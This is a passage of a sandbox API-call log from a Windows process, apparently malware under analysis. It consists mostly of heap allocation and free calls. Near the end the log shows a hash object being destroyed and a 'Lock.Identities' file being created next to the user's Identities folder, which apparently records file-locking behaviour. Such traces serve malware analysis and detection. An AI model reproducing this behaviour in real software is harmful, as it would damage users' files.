[0199.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0199.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0199.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0199.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0199.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0199.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0199.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0199.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0199.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0199.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0199.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0199.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0199.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0199.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0199.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0199.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0199.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0199.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0199.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0199.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0199.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0199.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0199.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0199.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0199.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0199.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0199.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0199.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0199.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0199.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0199.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0199.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0199.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0199.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0199.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0199.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0199.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0199.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0199.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0199.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0199.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0199.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0199.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0199.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0199.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0199.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0199.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0199.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0199.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0199.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0199.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0199.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0199.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0199.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0199.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0199.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0199.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0199.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0199.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0199.356] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0199.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0199.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0199.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0199.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0199.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0199.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0199.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0199.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0199.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0199.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0199.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0199.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0199.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0199.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0199.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0199.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0199.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0199.357] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0199.357] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0199.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0199.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0199.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0199.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0199.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0199.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0199.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0199.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0199.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0199.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0199.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0199.357] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0199.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0199.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0199.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0199.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0199.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0199.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0199.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0199.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0199.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0199.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0199.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0199.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0199.358] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0199.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0199.359] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0199.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0199.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0199.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0199.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0199.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0199.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0199.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0199.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0199.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0199.359] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0199.359] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0199.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0199.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0199.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0199.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0199.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0199.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0199.360] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0199.360] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0199.360] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0199.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0199.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0199.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0199.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0199.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0199.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0199.360] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0199.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0199.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0199.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0199.360] CryptDestroyHash (hHash=0xaa58e0) returned 1 [0199.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0199.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0199.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0199.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0199.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0199.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0199.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0199.361] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0199.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0199.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0199.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0199.361] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0199.361] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.361] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.361] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0199.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0199.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0199.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0199.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0199.361] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Identities" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\identities"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0199.362] GetLastError () returned 0x5 [0199.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0199.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0199.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0199.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0199.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0199.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0199.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0199.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0199.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0199.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0199.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0199.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0199.362] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0199.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0199.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0199.363] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0199.363] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0199.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0199.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0199.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0199.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0199.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0199.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0199.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0199.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0199.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0199.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0199.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0199.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0199.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0199.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0199.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0199.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0199.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0199.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0199.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x24b30f8 [0199.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0199.364] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming")) returned 0x2010 [0199.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b30f8 | out: hHeap=0x25c0000) returned 1 [0199.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0199.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0199.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x24b7a48 [0199.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0199.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0199.365] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Lock.Identities" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lock.identities"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x268 [0199.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0199.365] HeapFree (in: 